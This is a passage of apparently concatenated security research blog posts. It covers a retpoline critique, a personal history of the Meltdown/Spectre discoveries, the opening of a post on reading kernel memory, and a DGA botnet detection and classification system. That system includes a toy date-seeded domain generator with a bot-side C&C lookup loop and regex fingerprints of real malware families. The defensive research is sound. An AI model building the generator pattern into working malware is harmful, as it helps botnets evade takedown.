The second concrete problem I see is the construct which retpoline uses to direct speculative execution into the spinlock; this is a much bigger problem. On Skylake, return instructions predict by using the indirect branch predictor, requiring Skylake to be handled differently than other CPUs. The problem is twofold: on the one hand, the very common ret instruction needs to be replaced with retpoline (or other non-speculative branching), and on the other hand, a hardware interrupt raised in line 6 may underflow the RSB in the interrupt handler. Thus, retpoline is already potentially unsafe on some CPUs (in my opinion much less so than having no retpoline at all, though). The technical debt here is that retpoline may be completely unsafe if future CPUs stop relying on the RSB for return prediction. There may be many reasons for a CPU designer to change this, for example a completely unified system for indirect branches, or prediction of monotonic returns (returns with only one return address). The latter would keep the RSB safe from non-monotonic returns if the RSB underflows and may thus perform better with deep call stacks. I do not know whether these things are good ideas, but retpoline might effectively rule them out. Also, one could imagine conflicts with future CPU-based control-flow integrity systems, etc.

 

One could argue that performance optimizations rely on microarchitectural details all the time, but there is an important difference between breaking a performance optimization and breaking a security patch. We already see problems with software vendors updating broken libraries; it’s not difficult to imagine what would happen if secure software became insecure because of CPU evolution.

 

Instead of taking on technical debt potentially forever, I suggest we use either a less secure option (i.e. lfence ahead of indirect branches) or a more expensive option such as IBPB [7] or replacing indirect calls with iret (which is documented to be serializing). That constitutes a high price now, but avoids paying rent on technical debt in perpetuity.

 

Conclusion

Retpoline is an effective mitigation for the Spectre variants which rely on causing mispredictions of indirect branches on some CPUs. From a pure side channel perspective, retpoline adds a different side channel, but it is nonetheless an improvement over the side channel of a traditional indirect branch. Retpoline’s performance penalty is complex, but likely smaller than the penalty of the serializing alternatives. However, as retpoline relies on assumptions about the underlying microarchitecture, it adds technical debt if used widely. If Google, Microsoft, or whoever else with managed software deployment wants to use it, they have my blessing, but there are reasons for scepticism about whether it is a good idea to have it in general-purpose compilers. CPU vendors’ short-term marketing deficits should not lead us to trade small short-term performance gains for technical debt that has to be paid back with interest in the future in the form of a more complex microarchitecture.

Appendix added 14th of February 2018

Stephen Checkoway of the University of Illinois at Chicago commented that it might be worth testing an ud2 instruction in the speculatively executed spinlock. I find this idea promising because ud2 essentially just throws an “invalid opcode” exception, and thus abusing it for retpoline is likely to produce performance equivalent to that of lfence, perhaps even better. Further, it’s unlikely that using this instruction is associated with any technical debt. A simple test shows that the direct performance impact is approximately similar to that of the other versions of the spinlock (see the table above).

Some implemented versions of retpoline use a pause followed by an lfence instruction. I added this to the performance table as well. Thanks to Khun Selom & @ed_maste (Twitter account).

 

 

Literature

[1] Turner, Paul. “Retpoline”. https://support.google.com/faqs/answer/7625886

[2] Fogh, Anders. “Two covert channels”. https://cyber.wtf/2016/08/01/two-covert-channels/

[3] Fogh, Anders “Covert Shotgun”. https://cyber.wtf/2016/09/27/covert-shotgun/

[4] Intel, “Intel® 64 and IA-32 Architectures Software Developer’s Manual: Vol 3”. https://www.intel.com/content/www/us/en/architecture-and-technology/64-ia-32-architectures-software-developer-system-programming-manual-325384.html

[5] Intel. Intel® 64 and IA-32 Architectures Optimization Reference Manual. July 2017. https://software.intel.com/sites/default/files/managed/9e/bc/64-ia-32-architectures-optimization-manual.pdf

[6] Evtyushkin, Dmitry, Dmitry Ponomarev, and Nael Abu-Ghazaleh. “Jump over ASLR: Attacking branch predictors to bypass ASLR.” Microarchitecture (MICRO), 2016 49th Annual IEEE/ACM International Symposium on. IEEE, 2016.

[7] Intel, “Speculative Execution and Indirect Branch Prediction Side Channel Analysis Method”, https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00088&languageid=en-fr

Behind the scenes of a bug collision

Introduction

In this blog post I’ll speculate as to how we ended up with multiple researchers arriving at the same vulnerabilities in modern CPUs concurrently. The conclusion is that the bug was ripe because of a years-long build-up of knowledge about CPU security, carried out by many research groups. I’ll also detail the rough story behind the research that led me to the bug. My story is probably different from that of the other researchers, but while the details are unique, I am relatively sure the essence is the same for most researchers on most security issues: security research is a long-haul thing. The remainder of this blog post is semi-technical.

Why did we get a bug collision on Spectre/Meltdown?

This is of course my take on the event, my personal story, which I’ll detail below. Research collisions in CPU research aren’t that uncommon. In fact, the story of my friendship with Daniel Gruss is about a series of collisions. In 2015 I was preparing a talk about row hammer for Black Hat with Nishat Herath [2] when Daniel tweeted that he was able to flip bits from Javascript. I didn’t want to have questions I couldn’t answer, so I started researching it, and literally the evening before Daniel published how he was doing it, I knew how he did it. Later Daniel teased me about detecting cache side channels if there were no L3 cache misses. I replied ‘are you timing Clflush?’ He was indeed. You’ll find me being acknowledged in the paper for this reason [1]. I told him he shouldn’t worry about me competing on publishing it, because I was doing research on a side channel in the row buffer and didn’t have time to compete on Clflush. Turns out he and the WU cache clan were working on that too. I blogged it, and the WU cache clan wrote a paper on it, Pessl et al. [3]. You’ll find me acknowledged here as well. Not long after that, I did a blog post on breaking KASLR with the prefetch instruction. Obviously, Daniel was doing the exact same thing again. We had had enough of competition, and my by now regular collaboration with the WU cache clan started after that point.

So why do things like this happen? (Granted, the story about Daniel is a freaky one.) Well, CPU research is much like drawing a map of an uncharted world. Researchers start from known research and proceed into the unknown, and if they find something, they document it and add it to the map. This essentially means that the frontier looks very similar to everybody, leading people onto the same paths. This process is very much sustained by the fact that almost all research in this area is academic, and academia is much better organized in terms of recording and documenting results than hackers are.

For a thing like Meltdown, the real foundation was laid with the work on cache side channels sometime back around 2005. There are many papers from this time; I’ll mention Percival [4] because it’s my favorite. Another milestone paper was Yuval Yarom’s paper on Flush+Reload [5]. Note that Yuval is also involved in the Spectre paper. With this foundation, a subgenre of papers emerged in 2013 with Hund, Willems & Holz [6]. They essentially noticed that when an unprivileged user tries to read kernel mode memory, the CPU actually does a great part of the read process before raising an error, allowing a user to observe not the data of the kernel, but the layout of the kernel; this is known as a KASLR break and is important for classical exploits. This work was followed up with improvements, including Gruss et al. [7] and Jang et al. [8]. Both papers showed that a lot more work was being done by the CPU than strictly needed when an unprivileged user accesses kernel memory, an important prerequisite for Meltdown to exist. Also in 2016, another KASLR break using branches emerged, from Evtyushkin et al. [9]. They didn’t try to read from the kernel, but rather found that branch prediction leaked information. This is important because branch prediction is a precursor for speculative execution and thus builds a bridge towards Meltdown. Felix Wilhelm [10] extended Evtyushkin et al. [9] to hypervisors, which is likely to be important in the rationale for hypervisors being affected. In fact, I think Jann Horn mentioned this work as an inspiration. There were other works, like that of Enrique Nissim [11], which showed that such a KASLR break applies to a classic real-world exploit. Also in 2016, some work was being done on side channels in the pipeline. My Covert Shotgun blog post is an example of this literature [12]. To sum it up, by the end of 2016 it was known that unprivileged reads from user mode to kernel mode did more processing than strictly required, it was known that branches were important, and there was work going on examining the pipeline. In effect, the Meltdown bug was surrounded on all sides. It was a single blind spot on the map; obviously, nobody knew that there’d actually be a bug in this blind spot, and I think most did not believe such a bug existed. Other people would probably pick other papers, and there were many. My point remains: a lot of people moved towards this find over a very long period of time.

The personal perspective
I work for G DATA Advanced Analytics in an environment that is very friendly and supportive of research. Without research, a consulting company like ours cannot provide excellence for its customers. However, CPU bugs don’t pay the bills, so my day job does not have much to do with this. I spend my time helping customers with their security problems: malware analysis, digital forensics, and incident response are the main tasks that I do on a day-to-day basis. This means that the bulk of the work I do on CPUs is done in my spare time, after hours.

So my story with Meltdown and Spectre starts essentially at Black Hat 2016, where Daniel Gruss and I presented our work on the prefetch instruction. The video of our talk can be found here [13]. As described above, this work slowly gave me the fuzzy feeling that maybe it was just the tip of the iceberg. In fact, I did a blog post about the meta aspects of breaking KASLR in October 2016 [14] and presented it at RuhrSec 2017 [15], so I was very well acquainted with that literature. Meanwhile, I wanted to get away from working with caches, accidentally found some covert channels, and wrote about them [16]. I thought there might be more and started picking apart the pipeline in search of covert channels. My frustration led me to automate finding covert channels, which resulted in this blog post [12] and later this talk at HackPra [17]. In the talk, you can hear that I was still frustrated: “I don’t care, I’ll just use a shotgun”. To this day I have many unanswered questions about the pipeline.
Later that year I met up with the WU cache clan at CCS, where we were presenting the academic version of the prefetch KASLR break [7]. We had some beer-fueled conversations. The conversations continued at Black Hat Europe (Michael Schwarz and I did a talk on the row buffer side channel we’d done concurrent work on [18]), where I started believing that Meltdown might be possible, but still without a clue as to how it could possibly work.

I finally made the connection to speculative execution in December 2016/January 2017, when I prepared the presentation for HackPra about Covert Shotgun [17]. There are a lot of slides about speculative execution in it. At first, I didn’t think about reading kernel memory. My first “attack” was just another attack on KASLR: essentially Hund, Willems & Holz in a speculative version. That work never really got finished, since timing inside speculative execution is possible but not easy, and I did not find a solution to this problem until much later. The rationale for doing this work was that it would solve a problem with their method, and I do this stuff in my spare time: fun is essential, and this sounded like fun. So my project name for Meltdown was “undead KASLR”, despite me quickly figuring out there were bigger fish to fry. I told my friend Halvar Flake about the weird ideas while presenting at IT-Defense in February, and his encouragement was a big part of me actually continuing, because I didn’t believe it would work.

In March, I had the first chance to do some real work on the project during a small getaway from work to present Jacob Torrey’s and my work on PUFs (the work was really mostly Jacob’s, and not related to Meltdown per se) at Troopers 17. I researched in the mornings in the hotel and even did some research during other people’s talks. Fun fact: there is a video [20] of me doing a Spectre-style attack POC on the code I’d added to Alex Ionescu’s wonderful SimpleVisor [19]. Hi Alex! I’m the bald head seen to the lower left of the center aisle, doing weird head movements and packing away my laptop as I succeeded, at around 19 minutes into the video. The second half of the talk was pretty awesome btw!!

Later in March 2017, I visited Daniel, Michael, and Clementine Maurice in Graz to work on a common project we had on detecting double-fetch bugs with a cache attack (which became this paper [21]). Here I tried to pitch my idea, because with the workload I had, I knew it would be difficult to realize alone. Unfortunately, I wasn’t the only one fully booked out, and Daniel, Michael, and I were super skeptical at that time, despite the slight encouragement I’d had at Troopers. So we decided to finish the stuff we were already doing first. Might I add here that Daniel and Michael have done some really cool stuff since then? Struggling with work and with making a sufficient contribution to the double-fetch paper, the project was put on ice. The main reason why my name is so far back on that paper is that I didn’t have time to pull my weight.

After Troopers, I didn’t get much done and was really frustrated about it. So in July, I started back up again in the evenings. It helped me immensely that my climbing partner suffered an injury, giving me a bit more time. This time around I was working directly towards Meltdown. I was doing things in a much too complicated way at first and wasted a lot of time on that. Then I tried to simplify things as much as I could, and this is why I ended up with a negative result. I wrote up the blog post on company time on a Friday before noon, before leaving early for a vacation. Luca Ebach helped proofread it. If he hadn’t, it would’ve been unreadable and Tomasulo would’ve been spelled wrong. The “Pandora’s box” part of the blog post is a reference to the limited and unfinished stuff I did on “Spectre”, which I was sure would work at the time, but which needed checking before I’d commit to blogging about it. While on vacation, I decided to wrap things up in an academic paper and, with some positive results in my hands, seek help from some academic professionals. So I continued my research afterwards; after all, you don’t open Pandora’s box without looking at what is inside. In light of recent events, I shall not be publishing the rest of the stuff I did.

The stuff that Jann Horn did is really, really awesome, and the same goes for the Spectre/Meltdown papers. It is wonderful to see that I was barking up the right tree. It is important to me to mention that Jann Horn reported his research prior to my blog post and did not have access to mine prior to that date.

Literature

[1] Gruss, Daniel, et al. “Flush+ Flush: a fast and stealthy cache attack.” Detection of Intrusions and Malware, and Vulnerability Assessment. Springer International Publishing, 2016. 279-299.
[2] Nishat Herath, Anders Fogh. “These Are Not Your Grand Daddy’s CPU Performance Counters” Black Hat 2015, https://www.youtube.com/watch?v=dfIoKgw65I0
[3] Pessl, Peter, et al. “DRAMA: Exploiting DRAM Addressing for Cross-CPU Attacks.” USENIX Security Symposium. 2016.
[4] Percival, Colin. “Cache missing for fun and profit.” (2005).

[5] Yarom, Yuval, and Katrina Falkner. “FLUSH+ RELOAD: A High Resolution, Low Noise, L3 Cache Side-Channel Attack.” USENIX Security Symposium. 2014.
[6] Hund, Ralf, Carsten Willems, and Thorsten Holz. “Practical timing side-channel attacks against kernel space ASLR.” Security and Privacy (SP), 2013 IEEE Symposium on. IEEE, 2013.
[7] Gruss, Daniel, et al. “Prefetch side-channel attacks: Bypassing SMAP and kernel ASLR.” Proceedings of the 2016 ACM SIGSAC Conference on Computer and Communications Security. ACM, 2016.
[8] Jang, Yeongjin, Sangho Lee, and Taesoo Kim. “Breaking kernel address space layout randomization with intel tsx.” Proceedings of the 2016 ACM SIGSAC Conference on Computer and Communications Security. ACM, 2016.
[9] Evtyushkin, Dmitry, Dmitry Ponomarev, and Nael Abu-Ghazaleh. “Jump over ASLR: Attacking branch predictors to bypass ASLR.” Microarchitecture (MICRO), 2016 49th Annual IEEE/ACM International Symposium on. IEEE, 2016.
[10] Wilhelm, Felix. “Mario Baslr”, https://github.com/felixwilhelm/mario_baslr
[11] Nissim, Enrique. “I Know Where Your Page Lives: De-randomizing the Windows 10 Kernel”. https://www.youtube.com/watch?v=WbAv2q9znok
[12] Fogh, Anders. “Covert Shotgun”, https://cyber.wtf/2016/09/27/covert-shotgun/
[13] Fogh, Anders, Gruss, Daniel. “Using Undocumented CPU Behavior to See Into Kernel Mode and Break KASLR in the Process” Black Hat 2016.
[14] Fogh, Anders, “Micro architecture attacks on KASLR”, https://cyber.wtf/?s=kaslr
[15] Fogh, Anders. “Micro architecture attacks on KASLR and More”, https://www.youtube.com/watch?v=LyiB1jlUdN8
[16] Fogh, Anders, “Two covert channels”, https://cyber.wtf/2016/08/01/two-covert-channels/
[17] Fogh, Anders, “Covert Shotgun”, https://www.youtube.com/watch?v=oVmPQCT5VkY&t=34s, HackPra 2017
[18] Schwarz, Michael, Fogh, Anders. “Drama: how your DRAM becomes a security problem”. Black Hat Europe 2016 https://www.youtube.com/watch?v=lSU6YzjIIiQ
[19] Ionescu, Alex, “SimpleVisor”, https://github.com/ionescu007/SimpleVisor
[20] Neilson, Graeme, “Vox Ex Machina”, Troopers 17. https://www.youtube.com/watch?v=Xrlp_uNBlSs&t=1145s
[21] Schwarz, Michael, et al. “Automated Detection, Exploitation, and Elimination of Double-Fetch Bugs using Modern CPU Features.” arXiv preprint arXiv:1711.01254 (2017).
[22] Fogh, Anders. “Negative result: reading kernel memory from user mode” https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/

DGA classification and detection for automated malware analysis

Introduction

Botnets are one of the biggest current threats for devices connected to the internet. Their methods to evade security actions are frequently improved. Most modern botnets use Domain Generation Algorithms (DGAs) to generate and register many different domains for their Command-and-Control (C&C) server, with the purpose of defending it against takeover and blacklisting attempts.

To improve the automated analysis of DGA-based malware, we have developed an analysis system for the detection and classification of DGAs. In this blog post we will discuss and present several techniques of our DGA classifier.

The DGA detection can be useful to detect DGA-based malware. With the DGA classification it is also possible to see links between different malware samples of the same family. Such a classification is expressed with a description of the DGA as a regex.
Moreover, our analysis methods are based on the network traffic of single samples, not of a whole system or network, which sets them apart from most of the related work.

DGA-based Botnets

A Domain Generation Algorithm (DGA) periodically generates a high number of pseudo-random domains that resolve to a C&C server of a botnet [H. 16]. The main reason for its usage by a botnet owner is that it highly complicates the process of a takeover by authorities (sinkholing). In a typical infrastructure of a botnet that uses a static domain for the C&C server, authorities could take over the botnet with the cooperation of the corresponding domain registrar by changing the settings of the static C&C domain (e.g. changing the DNS records).

infrastructure of typical botnets
Typical infrastructure of a botnet

With the usage of a DGA that dynamically generates domains resolving to the C&C server, effective sinkholing is not possible anymore. Since the bots use a newly generated domain in every period to connect to the C&C server, it would be pointless to take control of a domain that the bots no longer use to build up a connection to the C&C server.

infrastructure of typical dga botnets
Typical infrastructure of a DGA botnet

The C&C server and the bots use the same DGA with the same seed, so that they are able to generate the same set of domains. DGAs mostly use the date as a seed to initialize the algorithm for domain generation; hence the DGA creates a different set of domains every day it is run. To initiate a connection to the C&C server, the bot first needs to run the DGA to generate a domain that may also have been generated on the side of the C&C server, since both use the same algorithm and seed [R. 13]. After every domain generation, the bot attempts to resolve the generated domain. These steps are repeated until the resolution succeeds and the bot has figured out the current IP address of the corresponding C&C server. Through that DGA domain the bot can then set up a connection to the C&C server.
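
As a toy illustration, such a date-seeded generate-and-resolve loop can look like the following sketch; the algorithm itself is invented for illustration and not taken from any real family:

  # Toy date-seeded DGA and bot-side resolve loop (invented algorithm).
  import datetime, random, socket

  def dga(date, count=1000):
      rng = random.Random(date.toordinal())  # same date and seed, same domains
      for _ in range(count):
          label = "".join(rng.choice("abcdefghijklmnopqrstuvwxyz")
                          for _ in range(12))
          yield label + ".com"

  for domain in dga(datetime.date.today()):
      try:
          c2_ip = socket.gethostbyname(domain)  # registered by the botmaster?
          break                                 # found the current C&C address
      except socket.gaierror:
          continue                              # not registered, try the next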

Motivation

DGA detection can be very helpful to detect malware: if the usage of a DGA can be detected while analyzing the network traffic of a single sample, it is very likely that the analyzed sample is malicious, since DGAs are commonly used by malware but not by benign software. DGA classification is the next step in the analysis after a DGA has been detected. A successful classification returns a proper description of a DGA. With such a unified description, it is possible to group malware using the same DGA. Being able to group malware by correlating characteristics improves the detection of new malware samples of these families, because the signatures of recently detected malware samples can be blacklisted automatically. The following figure shows, for non-DGA malware, that grouping malware families based on the same domains in their DNS request traffic is only possible if the samples all use the same static C&C domain:

static domain
Two samples using the same static C&C domain

If the malware uses a DGA, then grouping the malware is not trivial anymore, because the generated DGA domains are only used temporarily; using them to find links between samples would therefore not be very effective.

domain mismatch
Two samples with the same DGA but a different seed

Note also that the domains occurring in the network traffic of the analyzed malware sample could differ on another day with the very same sample analyzed, since many DGAs use the date as a seed. The solution is to calculate a seed-independent DGA description for every analyzed sample using a DGA. That description can then be used as a bridge between malware samples using the same DGA.

pattern descriptor
Pattern descriptor to abstract different DGA seeds

To solve this problem, we have divided it into three smaller tasks. Thus, the DGA classifier is structured into three components. Each component solves a task that contributes to the result of the DGA classification.

In this blog post we concentrate only on approaches for DGA detection and classification that can be automated, since we want to analyze a very high number of samples. Furthermore, we want to avoid unnecessary network traffic as much as possible; therefore we focus only on offline methods.

DGA Detection

This approach for DGA detection is based on statistical values calculated over the relevant label attributes of the domains. Since the domains generated by a DGA mostly follow a pattern, it is very useful to calculate the standard deviation of some attribute values [T. 13]. For some attribute values, the average can also be used to measure whether a domain was generated by a DGA or not. The same statistical values are also calculated over a list of domains from the Top 500 Alexa Ranking. These are considered reference values for non-DGA domains regarding the relevant label attributes.

The domains with multiple levels are split into their labels for further analysis.
E.g. the domain http://www.developers.google.com is split into:
com – Top-level domain (TLD)
google – Second-level domain
developers – Third-level domain
www – Fourth-level domain

All domains in the domain list resulting from a sample are compared level-wise, such that the labels of every domain are only compared with labels of the same level.
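
In Python, such a level-wise split can be sketched like this:

  # Sketch: split a domain into its labels, ordered from the TLD upwards.
  from urllib.parse import urlparse

  def labels(domain):
      host = urlparse(domain).hostname or domain
      return list(reversed(host.split(".")))

  print(labels("http://www.developers.google.com"))
  # ['com', 'google', 'developers', 'www']  (TLD first)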

To find proper indicators for DGA usage, we have done a level-wise comparison of statistical values calculated over several lexical properties of DGA domains and non-DGA domains (e.g. from Top 500 Alexa Ranking).

domain level.png
Different kinds of DGA patterns

Our experiments have shown that these statistical values over domain levels are very effective for DGA detection:

  • Average of the . . .
    • number of used hyphens
    • maximum number of contiguous consonants
  • Standard deviation of the . . .
    • string length of the label
    • consonant and vowel ratio
    • entropy
  • Redundancy of substrings or words in case of a wordlist DGA

With all these arguments, we can build a score with a specific threshold. If the score exceeds the threshold, the component decides that the analyzed domain list was generated by a DGA. Since the arguments are based on statistical values, which lose their significance with smaller sets, it is also important to consider the case of too few domains; in this case, the score is scaled down.
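
A heavily simplified sketch of this scoring could look as follows; the concrete features, reference values, and threshold are illustrative stand-ins for the ones used in our system:

  # Simplified DGA score over second-level labels; all reference values
  # and weights are illustrative stand-ins.
  import math
  from statistics import mean, pstdev

  VOWELS = set("aeiou")

  def entropy(s):
      return -sum(s.count(c) / len(s) * math.log2(s.count(c) / len(s))
                  for c in set(s))

  def max_consonant_run(s):
      run = best = 0
      for c in s:
          run = run + 1 if (c.isalpha() and c not in VOWELS) else 0
          best = max(best, run)
      return best

  def dga_score(labels, ref):
      # ref holds the same statistics computed over the Alexa Top 500
      score = 0
      if pstdev([len(l) for l in labels]) < ref["len_std"]:
          score += 1  # DGA labels tend to have very uniform lengths
      if pstdev([entropy(l) for l in labels]) < ref["entropy_std"]:
          score += 1  # ... and uniformly high entropy
      if mean([max_consonant_run(l) for l in labels]) > ref["cons_run_avg"]:
          score += 1  # random strings produce long consonant runs
      if mean([l.count("-") for l in labels]) > ref["hyphen_avg"]:
          score += 1
      # statistics lose significance on small sets: scale the score down
      return score * min(1.0, len(labels) / 10.0)

  # verdict: DGA if dga_score(second_level_labels, ref) exceeds the threshold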

Separation of non-DGA Domains

Malware often tries to connect to a benign host first (e.g. google.com) to check its connectivity to the internet. So, in the case of DGA-based malware, the samples do not only send requests to DGA domains, but also to non-DGA domains. Hence the program for DGA classification needs to expect a domain list containing both DGA domains and non-DGA domains. Before the program can classify a DGA, it needs to filter out the non-DGA domains. In this process, we assume that the majority of the domains in the domain list of the sample are DGA domains. Therefore, the non-DGA domains are considered outliers. We used different outlier methods to identify non-DGA domains (a simplified sketch follows the list):

  • Outlying TLD-label
  • Outlying www-label
  • Find outliers with the method of Nalimov [A. 84] regarding the following label attributes:
    • String length of the label
    • Digit and string length ratio
    • Hyphen and string length ratio
    • Consonant and vowel ratio
  • Outlying label count
  • Find outliers by too few occurring values regarding the following label attributes (the more often a value occurs, the higher the probability that it belongs to a DGA domain; we use the opposite case to find non-DGA domains here):
    • String length of the label
    • Consonant and vowel ratio
    • Digit and string length ratio
    • Entropy
    • Hyphen and string length ratio
    • Relative position of the first hyphen in the label
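
As an example, the first outlier method boils down to a majority vote over the TLD labels; a toy version (the other label attributes work analogously):

  # Toy version of the "outlying TLD-label" check: keep only the domains
  # whose TLD matches the majority TLD of the sample's domain list.
  from collections import Counter

  def drop_outlying_tlds(domains):
      tlds = [d.rsplit(".", 1)[-1] for d in domains]
      majority = Counter(tlds).most_common(1)[0][0]
      return [d for d, t in zip(domains, tlds) if t == majority]

  doms = ["qmbzpfukwrst.com", "rlwcxnvejyqd.com", "google.de"]
  print(drop_outlying_tlds(doms))  # ['qmbzpfukwrst.com', 'rlwcxnvejyqd.com']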

DGA Classification

After the separation process of DGA domains from non-DGA domains, we start with the classification of the DGA. The classifier analyzes the list of DGA domains and creates a regex, as specific as possible, that matches all these DGA domains. If the separation is not completely successful, the program will continue with the classification based on both DGA domains and non-DGA domains, which can lead to a wrong description of the DGA. But not every failing separation process causes a wrong classification. In some cases, if the non-DGA domains cannot be differentiated from the DGA domains regarding any domain attributes, the classification will still return the correct DGA description, since it covers only the relevant domain attributes. If the failing separation process causes a wrong DGA description, the resulting wrong or imprecise description can still be interpreted as a fingerprint calculated over the requested non-DGA domains and the DGA domains. That fingerprint is still useful to group malware of the same family, because it is very common that those requested non-DGA domains occur in other malware samples of the same family, too.

DGAs do not necessarily always generate the same set of domains, because in most cases the seed of the DGA changes (usually the date is used as the seed).
In the following picture, you can see that the calculated DGA regexes do not match because of the differing first letter, which seems to be seed-dependent in this case:

not equal dga
DGA with seed dependent first character

An important requirement for the automatically generated DGA description is that it needs to be independent of the seed. Since, from our perspective, it is not possible to determine which part of a DGA domain is seed-dependent, we use an approach that tries to generalize the seed-dependent part of a domain.
For this task, we use three layers of regexes that are hierarchically arranged:

  1. Layer: very generalized pseudo-regex
  2. Layer: generalized regex
  3. Layer: specific regex

All those regexes can be interpreted as DGA descriptions (calculated from only one sample) of the same DGA with different precision.
Such a hierarchy could look like this:

tinba dga
Tinba-DGA

simda dga
Simda-DGA
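
To illustrate the idea behind the most specific layer, the following toy function derives a layer-3 regex from a list of DGA domains; the real implementation covers more label attributes as well as the two more general layers:

  # Toy derivation of a layer-3 ("specific") regex: character range and
  # length of the second-level label plus the union of observed TLDs.
  def specific_regex(domains):
      seconds = [d.split(".")[-2] for d in domains]
      tlds = sorted({d.split(".")[-1] for d in domains})
      chars = sorted(set("".join(seconds)))
      charclass = "[%s-%s]" % (chars[0], chars[-1])  # simplistic range
      lens = [len(s) for s in seconds]
      lo, hi = min(lens), max(lens)
      quant = "{%d}" % lo if lo == hi else "{%d,%d}" % (lo, hi)
      tld = tlds[0] if len(tlds) == 1 else "(%s)" % "|".join(tlds)
      return r"%s%s\.%s" % (charclass, quant, tld)

  print(specific_regex(["bqkwvmtpxrsd.com", "cfjnpqsvwxyb.net"]))
  # -> [b-y]{12}\.(com|net), much like the Tinba entries in the table below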

Evaluation

Out of 113,993 samples, the DGA classifier detected 782 DGA-based malware samples.
To determine the false positive rate, we have reviewed the results of the analysis system manually. Regarding the DGA detection, we have found 38 false positives in our result set. Hence we have a false positive rate that is lower than 0.049% (under the assumption that the DGA-based malware samples queried a relatively high number of different domains). A false negative evaluation is hard in this case, because the number of input samples is too high for manual evaluation, and for an automatic false negative evaluation, the required ground truth for such a large sample set is missing.

The following excerpt shows some specific DGA regexes from the DGA classification, which used 38,380 DGA-based malware samples as input:

Domain Fingerprint / Regex                    Matches  Family name
[0-9A-Za-z]{8}\.kuaibu8\.cn                   569      Razy
[a-hj-z]{3}y[a-z]{3}\.com                     2082     simda
[a-z]{11}\.eu                                 829      simda
[a-z]{6,12}\.(com|info|net|org|dyndns\.org)   2047     Pykspa
[b-y]{12}\.(com|in|net|ru)                    8508     tinba
[b-y]{12}\.com                                6296     tinba
[b-y]{12}\.pw                                 7714     tinba
[b-y]{12}\.(biz|pw|space|us)                  35       tinba
[b-y]{12}\.(cc|com|info|net)                  17       tinba
[d-km-y]{12}\.(com|in|net|ru)                 172      tinba
[d-y]{12}\.(com|in|net|ru)                    110      tinba
[c-y]{12}\.(com|in|net|ru)                    45       tinba
[df-km-su-x]{12}\.(com|in|net|ru)             110      tinba
[a-z]{8}\.info                                216      tinba
v[12]{1}\.[a-uw-z]{7}\.ru                     77       Kryptik
v1\.[a-uw-z]{7}\.ru                           579
[b-np-z]{7,11}\.(com|net)                     113
[0-9A-Za-z]{8}\.[aiktux]{3}i[abnu]{2}8\.cn    114
[a-y]{6,19}\.com                              644      Ramnit
[a-z]{14,16}\.(biz|com|info|net|org)          173

It is conspicuous that the Tiny Banker Trojan (Tinba) occurs very often with different specific regexes in the result set. After generalizing most of the Tinba regexes, as described in the classification section above, it becomes possible to group all these samples with only one regex. The missing family names are due to the fact that we could not automatically determine to which malware family the samples that used the DGA belong.

Conclusion

The results show that DGA detection and DGA classification can be very useful to detect new malware samples by their DGA. Hence it is also possible to find links between old and new malware samples of the same family via their classified DGA.
The DGA detection seems to be very reliable for samples that have queried many different domains. Our implemented concept for DGA classification is successful in many cases. However, there are still cases where the calculated DGA descriptions are not correct, because the created patterns are sometimes overfitted to the given domain lists, or non-DGA domains were also considered in the calculation of the DGA descriptions. To contain this problem, we use the multi-layered regex generalization.
Even wrong DGA descriptions can still be considered fingerprints calculated over the domain list of the sample. Such a fingerprint can still be used to classify the DGA-based malware, so it makes a good contribution to automated malware analysis nonetheless.

Literature

[A. 84] A. Zanker. Detection of outliers by means of Nalimov’s test – Chemical Engineering, 1984.

[H. 16] H. Zhang, M. Gharaibeh, S. Thanasoulas, C. Papadopoulos – Colorado State University, Fort Collins, CO, USA. BotDigger: Detecting DGA Bots in a Single Network, 2016.

[R. 13] R. Sharifnya and M. Abadi – Tarbiat Modares University Tehran, Iran. A Novel Reputation System to Detect DGA-Based Botnets, 2013.

[T. 13] T. Frosch, M. Kührer, T. Holz – Horst Görtz Institute (HGI), Ruhr-University Bochum, Germany. Predentifier: Detecting Botnet C&C Domains From Passive DNS Data, 2013.

Negative Result: Reading Kernel Memory From User Mode

I was going to write an introduction about how important negative results can be. I didn’t. I assume you can figure out for yourself why that is, and if not, you have all the more reason to read this blog post. If you think it’s trivial why my result is negative, you definitely need to read the blog post.

The memory subsystem

I think most researchers would immediately think that reading kernel memory from an unprivileged process cannot work because of “page tables”. That is what the Instruction Set Architecture, or ISA, says. But to understand why that was unsatisfactory to me, we need to dig a bit deeper, and I’ll start at the beginning.

 
When software running on a core requires memory, it starts a so-called “load” command. The load command is then processed in multiple stages until the data is found and returned or an error occurs. The figure below shows a simplified version of this subsystem.

Memory hierachy.png

Software, including the operating system, uses virtual addressing to start a load (which is what a memory read is called inside the CPU). The first stage of processing is the L1 cache. The L1 cache is split into a data and an instruction cache. The L1 cache is a so-called VIPT or Virtually Indexed, Physically Tagged cache. This means the data can be looked up directly using the virtual address of the load request. This, along with its central position in the core, makes the L1 incredibly fast. If the requested data was not found in the L1 cache, the load must be passed down the cache hierarchy. This is the point where the page tables come into play. The page tables are used to translate the virtual address into a physical address. This is essentially how paging is enabled on x64. It is during this translation that privileges are checked. Once we have a physical address, the CPU can query the L2 cache and L3 cache in turn. Both are PIPT caches (Physically Indexed, Physically Tagged), thus requiring the translation through the page tables before the lookup can be done. If the data was in none of the caches, the CPU will ask the memory controller to fetch it from main memory. The latency of a data load from the L1 cache is around 5 clock cycles, whereas a load from main memory is typically around 200 clock cycles. With the security check happening in the page tables and the L1 being located before those, we can already see at this point that the “because page tables” argument is too simple. That said, the Intel software developer’s manuals [2] state that the security settings are copied along with the data into the L1 cache.

 

Speculative execution

In this and the next section I’ll outline the argumentation behind my theory, but only outline it. For those a bit more interested, it might be worth looking at my talk at HackPra from January [3], where I describe the pipeline in slightly more detail, though in a different context. Intel CPUs are superscalar, pipelined CPUs, and they use speculative execution; that plays a big role in why I thought it might be possible to read kernel memory from an unprivileged user-mode process. A very simplified overview of the pipeline can be seen in the figure below.

 

pipeline.png

